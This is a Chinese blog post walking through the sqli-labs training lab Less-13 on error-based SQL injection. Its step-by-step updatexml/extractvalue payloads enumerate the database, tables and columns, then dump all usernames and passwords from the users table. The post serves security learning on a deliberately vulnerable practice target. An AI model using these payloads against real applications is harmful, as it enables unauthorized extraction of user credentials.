sql_lab之sqli中的报错注入,less13

已于 2023-12-21 12:46:32 修改
阅读量538 收藏 7
点赞数 15
文章标签: sql 数据库 java
于 2023-12-21 08:49:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59020256/article/details/135121878
版权

报错注入(less-13)

正常报错注入:

1.输入用户名和密码123 123显示登录错误

2.输入用户名和密码123’ 123显示登录错误

123后面有’)说明是’)注入

3.查询数据库名

1') and updatexml('<a><b></b></a>',concat('1111',database(),'1'),'1') -- s

爆出XPATH syntax error: 'security1'

或者用1') and extractvalue('1',concat('1',database())) -- s

爆出XPATH syntax error: 'security'

4.查询表名

1') and extractvalue('1',concat('1',(select group_concat(table_name) from information_schema.tables where table_schema='SECURITY'))) -- s

5.查询users用户的字段名

1') and extractvalue('1',concat('1',(select group_concat(column_name) from information_schema.columns where table_schema='SECURITY' and table_name='users'))) -- s

6.查询username和password

输入这个

1') and extractvalue('1',concat('1',(select group_concat(username) from users))) -- s

Username结果显示

同理

1') and extractvalue('1',concat('1',(select group_concat(password) from users))) -- s

Password结果显示

注意该结果只能显示一行,所以说需要username和password分开查询,否则会出现错误

比如:

=1') and extractvalue('1',concat('1',(select group_concat(username),group_concat(password) from users))) -- s

结果为:

爱喝水的泡泡
关注
  • 15
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli_lab:学习和练习 SQL 注入的个人实验室
06-28
sql_lab sqli_lab 是一个学习和实践 SQL 注入的个人平台。 所有功劳都归于 udi-1。 所有实验室的想法都是奥迪的。 我只是用自己的方式重新编码了实验室。注射类型基于错误的 SQL 注入(联合选择)。 细绳整数双查询 ...
sql注入之报错注入
m0_59855041的博客
06-12 1036
(4)group_concat():GROUP_CONCAT(xxx):是将分组括号里对应的字符串进行连接.如果分组括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。注:利用extractvalue()对数据进行一个排序,指定第一个参数为null,可以换成1、#或者其他符号,使其报错,并执行第二个参数语句。(与extractvalue()基本一样,这是updatexml(1,concat(),3)多了一个3的参数。substring(abc,2,2)为bc。
sqli-labs】Less 5——报错注入(updatexml()函数)
用博客做做记录的小白
06-23 1688
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入,注入类型为单引号字符型。
SQLi LABS Less-13 报错注入+布尔盲注_ sqli less-13 ,2024年最新这么香的技术还不快点学起来
最新发布
2301_82101171的博客
04-18 360
登录成功时,会提示成功(写死的图片);截取当前使用数据库名字的第一个字符,为了方便脚本的编写,这里将字符转换为ASCLL再判断。页面显示数据库的报错信息,从报错信息判断出,注入点为:单引号+括号的字符型注入。猜第一个字符以后,再用此方法枚举其余字符,为了提高效率,稍后使用脚本自动化枚举。接下来使用穷举法,枚举该字符的所有可能性(对应的ASCLL码为:32~126)。从1开始递增测试的长度,可判断出具体的长度,稍后使用脚本自动化猜解。字符的ASCLL码肯定大于1,页面正常显示,表示payload可用。
sqli-labs通关全解--关于报错注入--less5-6-3
cyynid的博客
01-10 562
报错注入+less5+less6
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 2750
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sqli-labs】Less 6——报错注入(双引号)
用博客做做记录的小白
07-03 203
sqli-labs第6关less 6,双引号注入型,解题方法为报错注入函数。
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
sql_lab_第5关 Python源码SQL注入
04-25
SQLI-LAB是专门练习SQL注入的实验环境,最新有69道题涵盖了SQL注入的所有分类,相关下载链接:https://github.com/Audi-1/sqli-labs
sqli-lab注入练习源码
06-25
本套源码是sqli-lab,练习sql再好不过,将源码用phpstudy搭建即可开始练习
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
sql 注入 之sqli-labs/less-5 双注入,也称:报错注入
没有故事
03-03 957
模板:select * from user where id=1 and (updatexml("任意字符", concat(0x7e,模板:select * from user where id =1 and (extractvalue(1,concat(0x7e,,0x7e),"任意字符"));该关卡返回正确或者错误页面,还有错误的代码,所以可以使用报错注入。limit 0,1 limit 1,1 limit 5,1 分别查出字段名。0x3c,0x68,0x72,0x2f,0x3e : 换行符。
SQL注入】sqli-labs手注+sqlmap
m0_63563528的博客
07-19 1899
第一周:SQL注入学习
sql注入——报错注入
m0_73756016的博客
10-18 1303
报错注入是什么 什么是报错注入? 这是一种页面响应形式。响应过程如下: 用户在前台页面输入检索内容 后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。 数据库将执行的结果返回给后台,后台将数据库执行的结果无加区别的显示到前台页面上。 报错注入存在的基础:两个“无加区别”后台对于输入输出的合理性没有做检查 分类 1. 通过floor()报错注入 2.通过extractValue()报错注入 3.通过updateXml()报错注入 4.通过NAME_CONST()
SQL-labs的第34关——报错注入 宽字节注入(POST)
qq_73393033的博客
08-09 297
我们发现该网站会返回报错信息,直接使用报错注入吧。发现该关还是会向危险字符自动添加斜杠。截取数据包,进行注入,输入语句。出现报错,说明单引号逃逸成功。我们发现无法和反斜杠。
SQLilabs的第19关——http请求头注入(Referer)(报错注入
qq_73393033的博客
07-22 327
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
sqli-labs Less-5 (报错注入
A9874564的博客
02-25 4196
在实际场景,如果没有一个合适的数据返回点,而是仅仅带入Sql数据进行查询,就需要报错注入。 1.less 5 正常情况,我们构造闭合,发现没有问题 利用前几关的思路,发现无论怎么操作都是You are in......,这个时候一般的思路就行不通。 发现:仅带入Sql数据进行查询,没有一个合适的数据返回点,这时候可以尝试报错注入。 2.报错注入 2.1 extractvalue报错 示例: and extractvalue(null,concat(0x7e,(sql_inje.
SQLi-Labs 基于报错的SQL注入
shangMD01的博客
02-17 2472
实验环境 操作系统:Windows10 安装应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar等 靶机:A-SQLi-Labs 安装的应用软件:Apache、MYSQL、PHP;DVWA、SQLi-Labs 实验步骤: 1.访问目标网站 在Windows10上打开火狐浏览器,并访问靶机上的SQLi-labs网站Less-1 http://靶机ip/sql/Less-1 登录后,先给一个GET参数: http://靶机ip/sql/Less-1/?i
sql盲注之报错注入(附自动化脚本)
05-22
报错注入是一种SQL注入的方式,它利用了数据库返回错误信息的特性,通过构造特定的SQL语句来达到获取信息的目的。 以下是一个简单的报错注入示例: 假设有一个登录页面,用户需要输入用户名和密码才能登录。页面的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值